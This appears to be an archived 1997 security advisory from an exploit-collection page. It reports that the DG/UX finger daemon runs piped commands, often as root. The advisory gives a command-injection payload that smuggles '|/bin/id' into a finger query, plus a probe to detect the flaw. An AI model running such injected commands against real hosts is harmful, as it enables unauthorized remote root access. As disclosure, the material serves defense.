DG/UX in.fingerd hole

Description:Apparently (and amazingly) current dgux ships with a finger daemon that allows remote users to pipe commands. IE you can 'finger "|/bin/id@host'. This is made worse because many of these systems apparently run in.fingerd as root (!).
Author:George Imburgia <gti@HOPI.DTCC.EDU>
Compromise: remotely run arbitrary programs with UID that is running in.fingerd. Sometimes this means you can remotely become root .
Vulnerable Systems:dgux, versions unknown.
Date:11 August 1997
Notes:If this is true it is rather pathetic!

Date: Mon, 11 Aug 1997 12:32:38 -0400
From: George Imburgia <gti@HOPI.DTCC.EDU>
Subject: dgux in.fingerd vulnerability

Another old bug that won't die.

The finger daemon that ships with dgux will allow a remote user to pipe
commands, often with uid root or bin.

To check for this vulnerability, simply use the RFC compliant syntax;

finger /W@host

If it returns something like this, it may be vulnerable;

Login name: /W                          In real life: ???

To see the uid in.fingerd is running as, try this;

finger "|/bin/id@host"

Often, you will see something like this;

uid=0(root) gid=0(root)


uid=2(bin) gid=2(bin) groups=2(bin),3(sys),5(mail)

= George Imburgia                       =
= Network Specialist, Computer Services =
= Office of the President               =
= Delaware Tech                         =

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: